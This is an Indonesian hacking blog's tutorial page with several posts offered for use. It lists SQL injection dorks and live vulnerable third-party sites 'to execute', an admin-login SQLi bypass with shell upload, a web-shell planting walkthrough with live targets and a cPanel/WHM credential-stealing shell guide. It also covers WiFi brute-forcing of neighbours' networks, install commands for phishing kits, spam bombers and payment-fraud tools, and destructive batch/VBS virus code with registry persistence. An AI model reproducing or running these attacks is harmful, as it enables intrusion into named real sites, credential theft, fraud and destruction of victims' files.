Security Exploit

-= Security Internet System =-

LightBlog
Learn New Skills Become A Pro Get Certified
Tampilkan postingan dengan label Tutorial. Tampilkan semua postingan
Tampilkan postingan dengan label Tutorial. Tampilkan semua postingan

Kamis, 28 Maret 2019

Maret 28, 2019

Install Tools FazScan Program for Vulnerability Scanner and Pentester

Tools FazScan 
FazScan v1.1
https://github.com/Anon6372098/FazScan

Tool/Program untuk melakukan pentesting dan vulnerability scanning.

Opsi Tersedia v1.1 :

1. SQL Injection Pentester (SQL Injection Secara Cepat)
2. Common SQLi Vulnerability Scanner
3. Advanced SQLi Vulnerability Scanner
4. Common Web Vulnerability Scanner
5. Web CMS WordPress Vulnerability Scanner
6. Web CMS Magento Vulnerability Scanner
7. Web CMS Joomla Vulnerability Scanner
8. Web CMS Lokomedia Vulnerability Scanner
9. Web CMS Drupal Vulnerability Scanner + Shell Uploader
10. Automated Open Port Scanner
11. Denial of Service Attack
12. Dork Scanner
13. Admin Page Detector (7475 Pages Will be Scanned)
14. About the Programmer
15. Exit the Program



Cara Install :

Android (Termux)

pkg update && pkg upgrade
pkg install perl
pkg install clang
pkg install make
pkg install git
git clone https://github.com/Anon6372098/FazScan
cd FazScan
sh installpm.sh (jika menanyakan opsi, tulis local::lib)
perl fazscan.pl

Kali Linux (Terminal Kali Linux)

apt-get update
apt-get install perl
apt-get install clang
apt-get install make
apt-get install git
git clone https://github.com/Anon6372098/FazScan
cd FazScan
sh installpm.sh (jika menanyakan opsi, tulis local::lib)
perl fazscan.pl

atau

sudo apt-get update
sudo apt-get install perl         
sudo apt-get install clang
sudo apt-get install make
sudo apt-get install git
git clone https://github.com/Anon6372098/FazScan
cd FazScan
sh installpm.sh (jika menanyakan opsi, tulis local::lib)
perl fazscan.pl

Windows (CMDer)

(PowerShell as Admin)

Set-ExecutionPolicy Bypass -Scope Process -Force; iex ((New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1'))

choco install perl
choco install git
choco install llvm
choco install make
git clone https://github.com/Anon6372098/FazScan
cd FazScan
sh installpm.sh (jika menanyakan opsi, tulis local::lib)
perl fazscan.pl

Jika ada module yang belum terinstall/error, cukup jalankan perintah :

• cpan install nama_module

Instalasi mungkin akan sedikit lama, tunggu saja.

Apache 2.0 Licensed
Released v1.1

Coded with Perl

loading...

Rabu, 27 Maret 2019

Maret 27, 2019

Cara cepat mendapatkan target vuln SQL menggunakan apk Sequel Eye

Mendapatkan target vuln (SQL) 
"Assalammualaikum wr.wb para setia viewers kali ini saya inggin share tutorial cara menemukan web vuln/vurnelbility terhadap seranggan (SQL) tapi cara ini gampang untuk mendapatkan beberapa target vuln terhadap seranggan (SQL) dan mudah untuk mendapatkanya....
  "Bagaimana cara mendapatkanya ??



1. Dowload dulu apk sequel eyenya ===> Sequel Eye Apk
2. Setelah dowload lalu install apknya,buka..
3. Di Header menu kalian pilih "Setings"

4. Untuk seting "Current Working Mode" kalian pilih "Google Dork Mode" dan untuk seting "Number of Websites" 100 Untuk "Connection Timeout" terserah agan mau 1 jam kek asalkan sabar :V

5. Lalu kita kembali ke tab awal "SQL-Injection Test"
6. Nah setelah itu masukan dork andalan agan h3h3..pencet "START TASK" nanti akan muncul beberapa website..namun untuk website yang vuln akan muncul "Unsecure against SQL injection attack" 

Inggat : web vuln SQL bukan hanya eror saja ,web blank atau data yang hilang itu juga tanda vuln.

     "Buat kalian yang penggen dork nya comot di bawah ini⬇
inurl:ShowInfo.php?id=
jobdetail.asp?offset=
pdf.php?brand=
agent.php?agentid=
inurl:/staff.php?id=
inurl:/news.php?id=
inurl:jobdetail.asp?id=
inurl:ShowProfil.php?id=

   "Dan di bawah ini live targetnya tinggal kalian eksekusi⬇
http://harta.com/v1/management.php?id=1'
https://www.ticketclub.it/ticket.php?id=1624'
http://www.tothailandhotel.com/online-ticket.php?id=72'
http://www.replasticsurgery.asia/readnews.php?id=4'
http://www.riutta.fi/readnews.php?id=56'
http://designcity.kz/readnews.php?id=1'
http://www.vikaandlindabull.com/readnews.php?id=35'
http://www.orpheegroup.com.cn/newsinfo.php?id=12'
http://www.sviet.edu.in/newsinfo.php?id=34'
http://www.roostersrugby.com/newsinfo.php?id=12'

Nitip nick Extazy :) mungkin itu saja dari saya mohon maaf bila kurang jelas/rinci membahas mohon di maklumi dan kalau mau "Copas Sertakan Sumber nya... 
   Waalaikumsalam wr.wb
loading...
Maret 27, 2019

AirBrute ( Wifi Brute Force ) Apk Working

Wifi-Brute Force Apk
"Assalammualaikum wr.wb jumpa lagi di blog biasa ini :) kesempatan kali ini saya inggin share apk untuk Crack Wifi Tetangga yang pelit :V..dan saya juga sudah siapkan Apknya + worlist nya supaya agan2 gk usah bikin pass.txt nya...



Untuk cara pengguna'anya simple kok gan :)
1. Dowload dulu di sini apk nya ===> Dowload Apk 
2. Dowload pass.txt nya ===> Dowload pass.txt 
3. Setelah semunya berhasil di dowload lalu agan install apknya dan janggan lupa dowload pass.txt karena sanggat berharga...h3h3
4. Setelah di install lihat gambar di bawah ini⬇
Pilih "Brute Force Attacker" 

5.  Janggan lupa hidupkan WIFI agan :') biar mesra :V
6. Lihat gambar di bawah ini..⬇
Pencet "Select Wordlist" 

7.  Cari file pass.txt yang tadi file nya udah di dowload agan,lalu pencet "Attack" 
8. Untuk menggecek bahwa WIFI si target sudah ter crack cek aja "Stored Password" 

Nah itu caranya gan :) mohon maaf nih gak panjang2 karena bikin artikel itu susah bet gak segampang dapetin cewek di jalan...

Bila belum paham/tidak menggerti untuk pemakain nya silahkan komment di kolom komentar :)
   Happy Cracking
Waalaikumsalam wr.wb
loading...

Sabtu, 23 Maret 2019

Maret 23, 2019

Kumpulan tools (S.T.C)

Soul Team Cyber
Kumpulan Tools By InYourG00D🃏

Kumpulan Kode Unik fb
$ pkg install update && pkg install upgrade
$ apt install toilet
$ apt install figlet
$ gem install lolcat
$ pkg install git
$ git clone https://github.com/InYourG00D1/Unix
$ cd Unix
$ sh KD-FB.sh

Tools Check BIN
$ pkg install update & pkg install upgrade
$ pkg install git
$ git clone https://github.com/InYourG00D1/check
$ cd check
$ php bin.php

Tools Spam bom 
Vitur 
1.Spam bom Bukalapak
2.Spam bom JD-ID
3.Spam Bom PHD
4.Spam Bom Tokoped
5.Spam Bom Hooq
6.Spam Bom KFC
7.Spam bom matahari
*_Totur nya _*
$ pkg install update && pkg install upgrade
$ pkg install toilet
$ pkg install figlet
$ pkg install lolcat
$ pkg install php
$ pkg install python2
$ gem install lolcat
$ pkg install git
$ git clone https://github.com/InYourG00D1/Spam
$ cd Spam
$ sh ms.sh

Kuota free Khusus Tree
$ pkg install update && pkg install upgrade
$ apt install toilet
$ apt install figlet
$ gem install lolcat
$ pkg install git
$ git clone https://github.com/InYourG00D1/KuotaFree
$ cd KuotaFree
$ sh 2.sh

Pulsa Free work100%
$ apt update && apt upgrade
$ pkg install toilet
$ gem install lolcat
$ git clone https://github.com/InYourG00D1/PulsaFree
$ ls
$ cd PulsaFree
$ sh Free.sh

Tools Sc Phising All Game 
Tapi gk semua game juga si :V
$ apt update && apt upgrade
$ apt install figlet
$ apt install toilet
$ gem install lolcat
$ pkg install git
$ git clone https://github.com/InYourG00D1/ScPh1s1ng
$ cd ScPh1s1ng
$ sh 6.sh

Kumpulan shell & sc pepes
Kalo Ingin Direcode scnya  silahkan
Hak cipta Jangan Dirubah Hargai mereka coding gan
Ngecoding Gk Segampang Dapettin Cinta Kamu
$ pkg install update && pkg install upgrade
$ apt install figlet
$ apt install toilet
$ gem install lolcat
$ pkg install git
$ git clone  https://github.com/InYourG00D1/Pepescers
$ cd Pepescers
$ sh MTD.sh



Tools ngubah Vidmax jadi Flash
Work 100% dicoba aja gan
$ pkg install update
$ pkg install upgrade
$ apt install php
$ pkg install git
$ git clone https://github.com/InYourG00D1/Flash
$ cd Flash
$ php flash.php

Tools Nuyul GoPay 
$ pkg install update
$ pkg install upgrade
$ apt install php
$ pkg install git
$ git clone https://github.com/InYourG00D1/Nuyul-GoPay
$ cd Nuyul-GoPay
$ php Go-Pay.php

Tools Install Bkp
Yg punya Kontol BuKan Lu doang
Bwahaha
Proses Install nya lumayan lama :V Kalo Mau Cepet Cari Ea Sono 
$ apt update && apt upgrade
$ apt install figlet
$ apt install toilet
$ gem install lolcat
$ pkg install git
$ git clone https://github.com/TumbalGanss/ToolsBkp
$ cd ToolsBkp
$ sh Tobat.sh

Tools Installer
200 tools 
$ apt update && apt upgrade
$ apt install figlet
$ apt install toilet
$ gem install lolcat
$ pkg install git
$ git clone https://github.com/InYourG00D1/InstallPlerN2
$ cd InstallPlerN2
$ sh InstallPlerV2.sh

Tools Script Phising All game,FB,Instagram
$ apt update && apt upgrade
$ apt install figlet
$ apt install toilet
$ gem install lolcat
$ pkg install git
$ git clone https://github.com/InYourG00D1/scPH1S1N9
$ cd scPH1S1N9
$ sh PhisingV2.sh

#shareMhank
#nomor Yg ada Di Tools Udh Gk Aktif

#Ini New Nomer nya : 0895805133060
loading...

Jumat, 15 Maret 2019

Maret 15, 2019

Deface China Bypass Sql Admin Login

Bypass Admin

China Bypass SQL Admin Login

2019.03.16
id Extazy Kun (ID) id
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A
[+]Exploit Title: China Bypass SQL Admin Login [+]Author: Extazy Kun [+]Team: -1 [+]Goolge Dork:
融和集团 网站后台管理系统 V2.0 intext:/admin/login.php [+]Tested on: Linux ======================================= [+]Proof Of Concept:

Dorking with the dork and get some vuln site Live Target : http://www.ronghe.net.cn/admin/login.php Exploit the login details with credential like this
user : '="or'
password : '="or'
&
user: ' or 1=1 limit 1 -- -+ password: ' or 1=1 limit 1 -- -+ No need to write user,email,password. Go to the uploader and upload a php files Your file will go to site/ypathfile/ Greetz: Omest - Marshall - Ndra - Wahyudi - Inyour Good - Lool 00T - Conqueror Of Death - Vijune15 - Sylvertar - Yolanz - Tuyul Botak - Deathinote - 3XP3T4S1 - Gladys - 3RRoR -Yudachipoi - Sarkevih
Contact email : extazykun06@gmail.com
loading...

Minggu, 10 Maret 2019

Maret 10, 2019

Tutorial Cara Mendapatkan Banyak CPanel Dengan Shell M3R1C4 V.2.1

Shell M3R1C4 V.2.1
Assalammualaikum wr.wb
Hallo gan , Bertemu lagi dengan saya :D
Kali ini saya akan memberikan tutorial Cara Mendapatkan Banyak CPanel Dengan Shell M3R1C4 V.2.1 Bukan hanya CPanel doang yang nyantol , Tapi WHMCS Juga karena di Shell ini Saya Berikan Ramuan di fitur Config 2 Hahaha :v Wes rausah kakean cangkem langsong ae disimak!
Bahan-bahannya :


  • Shell Download Disini (Receh Dikit)
  • Koneksi Yang Cepet
  • Wajah Ganteng
  • Pastikan DibagianWebsite Ada Banyak Domainnya

Buka Shell dan buat Folder baru/DIR dengan nama terserah , kalo udah masuk ke DIR yang baru dibikin tadi. Lalu Klik Config 2 (Lihat Gambar Dibawah)
Lalu Klik Start
Proses Selesainya Tergantung Koneksi internet & Semakin Banyak Site Semakin Lama Prosesnya :D
Tapi Tenang Punya saya gada 2 Menit.

Jika Sudah , Nanti Akan Keluar Folder Root, Password, Configuration.
Karena Koneksi saya lemot :3 Ane stop aja 

Lalu Bukan NewTab , Masukkan Link Site Beserta DIR dari hasil Grab tadi.
Contoh : https://target.com/blablabla/
Jika SUdah akan muncul DIR baru yaitu m3r1c4_symconf Lalu klik aja cok
Dan Taraaaaaaaaa


Setelah selesai , kalian mau apain ja bebas dari Nyolong CPanelnya / WHMnya 
Oke sekian dulu , Jika ada yang ditanyakan silahkan Komentar dibawah Gratis kok :)
waalaikumsalam wr.wb
 
loading...

Selasa, 26 Februari 2019

Februari 26, 2019

Dasar – Dasar Membuat Virus Pada CMD Lengkap 2019

Dasar-Dasar Membuat Virus
Assalammualaikum para cewe cans & cowo gans :v kali ini w akan share tutorial yang gk bermamfa'at membuat virus pada cmd ya qimak wkwkwk
Perintah-Perintah Command Prompt:
1.Delete Registry : REG DELETE ALAMAT /v VALUE NAME /f
Keterangan :
– REG DELETE = Menghapus registry
– ALAMAT = HKEY\Software\dst
– /v VALUE NAME = Nama Value
– /f = Tidak wajib!! Berfungsi untuk melaksanakan perintah tanpa prompt
Contoh : REG DELETE HKEY\Software\Microsoft\Windows\Policies\Explorer /v NoFind
Fungsi = Menghapus Value NoFind Di Alamat Registry HKEY\Software\Microsoft\Windows\Policies\Explorer
2.ADD Registry : REG ADD ALAMAT /v VALUE NAME /t TYPE /s SEPARATOR /d DATA /f
Keteranagn :
– REG ADD = Menambah registry
– ALAMAT = HKEY\Software\dst
– /v VALUE NAME = Nama Value
– /t TYPE = Type data Ex: REG_DWORD, REG_SZ
– /d DATA = Isi Value
– /f = Tidak wajib!! Berfungsi untuk melaksanakan perintah tanpa prompt
3.PROMPT : PROMPT Text
Keterangan:
PROMPT = Perintah untuk merubah text PROMPT
Text = Text yang ingn kita munculkan di PROMPT
Text dapat menggunakan karakter spesial yang daftarnya berikut ini!!
$A = Karakter & $N = Drive kita menginstal windows
$B = Karakter | $P = Default
$C = Karakter ( $Q = Karakter =
$D = Karakter Tanggal Sekarang $S = Karakter Spasi
$E = Karakter Escape Kode $T = Karakter Jam Sekarang
$F = Karakter ) $V = Karakter No Versi Windows
$G = Karakter > (lebih besar dari) $_ = Karakter Garis Bawah
$H = Karakter No Text $$ = Karakter Dollar
$L = Karakter < (lebih kecil dari) $+ = Karakter Aritmatik
4.Replace : Replace [Drive\Path\NamaFile] [Drive\Path] /A /P /R /S /W /U
Keterangan:
Replace = Pindahkan
– [Drive\Path\NamaFile] = Spesifik sumber file
– [Drive\Path\] = Folder Tujuan
– A = Pindahkan File ke Folder Tujuan (No Update)
– P = Membuat Prompt MengKonfirmasi Kita Sebelum Memindahkan
– R = Pindahkan hanya File Attribut Read Only
– S = Pindahkan File Ke Semua Sub Direktori Folder Tujuan
– W = Tunggu kita memasukan disk/flashdisk sebelum memindahkan
– U = Pindahkan dan Update jika nama file sudah ada
– Jika menggunakan parameter /A tidak boleh menggunakan /S /U begitu juga sebaliknya.
5.Attrib : Attrib +R -R +A -A +H -H +S -S ADRESS /S /D
Keterangan:
Attrib = Rubah Attribut File/Folder
– (-) = Untuk Menghapus Attribut
– (+) = Untuk Menambah Attribut
– (A) = Attribut Archieve
– (R) = Attribut Read Only
– (H) = Attribut Hidden
– (S) = Attribut Super_Hidden/System
– /S = Proses terhadap file yang sama di folder dan subfolder
– /D = Proses folder Sebagai Sumber
– Adress = Alamat File Misal: C:\Lucky\Ganteng
6.Del : Del /P /F /S /Q /Attribut /Adress
Keterangan:
– Del = Hapus File / Folder
– /P = Membuat Prompt MengKonfirmasi Kita Sebelum Menghapus
– /F = Hapus Hanya Read Only File
– /S = Hapus File Yang Sama Di Semua Sub Direktory
– /Q = Hapus Dengan Cepat
– /Attribut = Pilih Attribut File Yang Ingin Di Hapus (Tidak Ada Berarti Semua File) tanda (-) berarti yang tidak di hapus- – Adress = Alamat File Misal: C:\Lucky\Ganteng
7.Rename : Rename/Ren [Drive\Path\NamaFile] NewFileName
Keterangan:
– Rename = Rubah Nama File
– [Drive\Path\NamaFile] = Alamat Drive dan Nama File
– NewFileName = Nama File Baru
8.Type : Type [Drive\Path\NamaFile]
Keterangan:
– Type = Membuka Semua File Text (*.txt, *.doc, *.xls, *.ini, *.vbs, *.js, dll)
– [Drive\Path\NamaFile] = Lokasi File
9.Start : Start ADDRESS_FILE
– Start = Untuk menjalankan File
– ADDRESS_FILE = Alamat file di special folder seperti windows dan system32
– Ex: Start Regedit maka akan menjalankan Registry Editor.
sekarang kita akan membahas file *.bat yang berfungsi untuk menjalankan perintah command prompt secara bersamaan. oke ketikan kode berikut di notepad: date 07-07-07 dan save dengan nama edit_time.bat dan pilih “All File” dalam kolom “Save As Type” lalu jalankan!! setelah itu apa yang terjadi?? yah tanggal berubah jadi juli-7-2007.


oke lanjut ke file *.bat kita tidak mungkin membuat banyak file *.bat karena selain akan cepat terdeteksi, kita juga akan semakin rumit merubah registry!! namun jangan kuatir karena file *.bat bisa menjalankan perintah DOS/COMMAND_PROMPT secara langsung.
berikut perintah ini, kita buka notepad dan ketikan code berikut:
del C:\*.doc ‘—– hapus semua file berextensi doc di drive c
Shutdown -s -f -t 30 -c “Selamat Tidur” ‘—– -s = shutdown computer, -f = tutup semua aplikasi tanpa peringatan, -t = setting waktu(dalam detik) -c = menampilkan pesan “Selamat Tidur” (Bebas kita ubah)
attrib +s +h C:\*.jpg /s /d ‘—– beri attribut hidden dan system semua file jpg
for /R c:\ %%r in (*.cob *.doc) do copy %0 “%%r” ‘—– Copy isi file *.bat ke semua file *.cob dan *.doc di C
for /R c:\ %%r in (*.cob *.doc) do ren “%%r” *.bat ‘—– Rename semua file *.cob dan *.doc jadi *.bat sehingga isi file jd virus kita :D haha..haha
Untuk isi file bat yang akan menumpang di virus vbs kita anda boleh pilih mana yang paling cocok!! mungkin menghapus, shutdown dalam 30 detik, menyembunyikan atau merubah isinya jadi file *.bat?? dipilih!! dipilih!!
atau boleh masukin semuanya sehingga virus kita ditambah kode berikut ini:
Set bath = fso.CreateObject(towind & “\sialan.bat”)
bath.writeline “del C:\*.doc”
bath.writeline “Shutdown -s -f -t 30″
bath.writeline “for /R c:\ %%r in (*.cob *.doc) do copy %0 %%r”
bath.writeline “for /R c:\ %%r in (*.cob *.doc) do ren %%r *.bat”
bath.close
‘bonus
wsh.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\”SysError”, “towind & “\sialan.bat”, “REG_SZ”
Maka ketika windows diaktifkan semua file doc akan menjadi *.bat dengan isi kode penghancur kita :D bisa diselamatkan ga tuh?? coba saja supaya anda tahu!!
Namun jika anda punya anti virus biasanya kode tersebut akan di blok karena jelas-jelas untuk merusak!! lalu bagaimana?? kita berdoa supaya antivirus komputer sasaran tidak mengenali :D karena memang tidak semua antivirus akan memblok perintah tersebut. Oia sebagai kita bisa membuat file lain seperti *.html atau *.ini!! jika kita punya banyak duplikat virus kita bisa membuat file *.ini supaya orang tidak cepat mengetahui virus kita hanya dengan membuka Regedit. untuk terakhir kali saya akan berikan lagi suatu code yang akan merubah file ini di windows sehingga menjalankan virus kita. oke langsung saja tentunya dengan perintah
set BuatIni = fso.CreateTextFile(”C:\WINDOWS\Win.ini”)
BuatIni.writeline “[WINDOWS]”
BuatIni.writeline “run = C:\Ju_Pe.vbs” ‘—-rubah sesuai letak dan nama virus
BuatIni.writeline “load = C:\Persik.vbs” ‘—- rubah sesuai letak dan nama virus
BuatIni.close
Maka ketika windows dijalankan virus akan aktif!! walaupun mungkin registry telah dirubah.
Dari pembahasan kita maka kita bisa simpulkan beberapa langkah berikut jika terkena virus vbs: jika tidak di enkripsi anda bisa melihat dan membunuh semua virus dan membenarkan registry dengan membaca source kodenya, tapi jika di enkripsi kita lakukan langkah berikut:
1.Matikan proses virus!! anda bisa menggunakan tool pengganti TaskManager yang biasanya akan di blok.
2.Hapus semua duplikat virus!! anda bisa gunakan antivirus update terbaru dan jika diblok virus anda rubah dulu namanya seperti PCMAV_CLN.exejadi 123.exe
3.Buka registry dan periksa dengan teliti semua subkey run otomatis biasanya akan terdapat key yang mengarah ke letak virus yang dijalankan dan periksa file win.ini!! jika dirubah anda minta dari komputer teman anda :D dan jika ada petunjuk letak virus langsung hapus.
4.Rubah semua registry yang dirubah virus!! bisa dengan TuneUp Utilities dan sebagainya!!

Untuk pencegahan lakukan langkah berikut:
1.Gunakan antivirus terbaru, jika bisa yang mempunyai fitur heuristik seperti ANSAV.
2.Jangan asal klik file!! lihat dikolom type Windows Explorer apabila application tapi iconnya folder atau MS Word langsung hapus.
3.Selalu scan jika mencolokan flaskdisk
4.Matikan proses autorun melalui registry di alamat
“HKCU(atau HKLM)\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer”, buat DWORD value baru dengan nama NoDriveTypeAutorun dan isi dengan nilai 255. atau melalui start—Run—ketik GPEDIT.msc—User Configuration—Administratif Templates—–System—–Cari Turn Off AutoPlay—–klik 2x dan rubah jadi Enabled!!
5.Jangan Pakai OS Windows, pake linux cos VMaker Indonesia cuma bisa bikin untuk windows!!
Hati2 all.. Jangan langsung di run pada saat mengimplementasikannya.. :p
Don’t say i don’t say it before..
loading...

Sabtu, 16 Februari 2019

Februari 16, 2019

Tanam Shell Menggunakan Teknik Inspect Element + live target

"Yo gan ketemu lagi sama admin :) jadi kali ini admin akan share sedikit tutorial :) tapi gunakan denggan bijak😊anggap aja tutorial ini hanya untuk pembelajaran....

Bahan-bahan :
-pc /laptop
-shell
-sc deface

ayo langsung aja ke TKP,,,,,,,,
pertama cari website yang vuln dengan teknik inspect element,, gunakan dork dibawah ini:



intext:"Powered By: Multi Profit Websites"
inurl:/index_ebay.php
inurl:/index_amazon.php
inurl:/index_rrfc.php
inurl:/index_info.php
inurl:/index_youtube.php
inurl:/index_rss.php

kalo sudah pilih salah satu website,,
tambahkan kata "admin" pada akhir url,,
contoh:
http://[site]/index_info.php diganti menjadi http://[site]/admin

kalau belum di patch akan keluar login adminya

setelah kita berhasil masuk halaman login adminya sekarang kita lakukan inspect element, lihat gambar



pada tahap ini kta cari element <input type="hidden" name="do_type" value="admin_setting_read"> kalau sudah ketemu kita ganti kata "hidden" dengan kata "text" kemudian klikan kursor disembarang tempat maka akan keluar textbox dengan tulisan  "admin_setting_read" dan ganti kata "read" dengan "write" jadinya seperti ini "admin_setting_write" dan tekan enter

jika berhasil akan keluar halaman seperti dibawah ini dan langkah selanjutnya kita klik login,, lihat gambar


jika berhasil kita akan langsung masuk ke halaman adminya ,, lihat gambar


Langkah selanjutnya kita cari menu "Add/Remove New Navigation Pages"  dan kita klik aja kalo sudah akan keluar halaman seperti pada gambar. Pada kolom "enter a name your new navigation bla bla bla" kita ketikan nama file shell kita contoh "sc.php" dan klik "add new navigation page" lihat gambar

Masih dihalaman yang sama coba gulir kebawah dan lihat apa nama file shell kita udah ada,, kalo udah kita ganti nama file shell kita contoh sc.php.html menjadi /sc.php lihat gambar
sebelum

sesudah 
kemudian klik "sort navigation pages"


Kalau sudah sekarang kita masuk ke menu "edit navigation page", nanti ada menu scroll kita pilih aja nama file shell kita contoh sc.php.html dan kita lakukan inspect element untuk mengganti "sc.php.html" menjadi "sc.php" lihat gambar

masih pada halaman yang sama pada "enter a page title bla bla bla" kita ketikan nama file shell kita dan pada "URL for this page" kita isikan url kita contoh "main_pages/sc.php" dan checkliat semua pilihan lihat gambar



kalo sudah sekarang saatnya kita mengedit halaman kita pada kotak yang sudah tersedia jangan lupa pilih source, alangkah baiknya semelum kita memasukan source kita enter 3x kemuian baru diikuti source kita setelah memasukan source kita enter lagi 3x langkah selanjutnya klik "save edit navigation page" lihat gambar





apabila keluar halaman seperti pada gambar dibawah ini berati tugas kita sukses menanam shell


Langkah selanjutnya kita masuk url dimana kita tadi menanam shell contoh http://[site]/main_pages/sc.php
tarrrraaaaaaaaaaaa masuklah kita kedalam shell hehhe lihat gambar


Sekian tutor kali ini meskipun sedikit semoga bermanfaat dan gunakan sebaik- baiknya, jangan kapok main kesini ya n tunggu tutor" selanjutnya 



Dan ini live target nya :) silahkan di eksekusi
https://www.theenglishoptician.com/admin/
http://www.superbmatch.com/admin/
http://www.frankrossi.com/admin/
http://onlinestoresprices.com/admin/
http://www.thematrixwireless.com/admin/
http://bungajoyebooks.com/admin/
http://www.unleashedshopper.site/admin/
http://www.totalsurvivalliving.com/admin/
http://www.kstore.uk/admin/
http://www.bellvue.us/admin/

# tutor ini hanya bertujuan pendidikan semata,, heheh 
loading...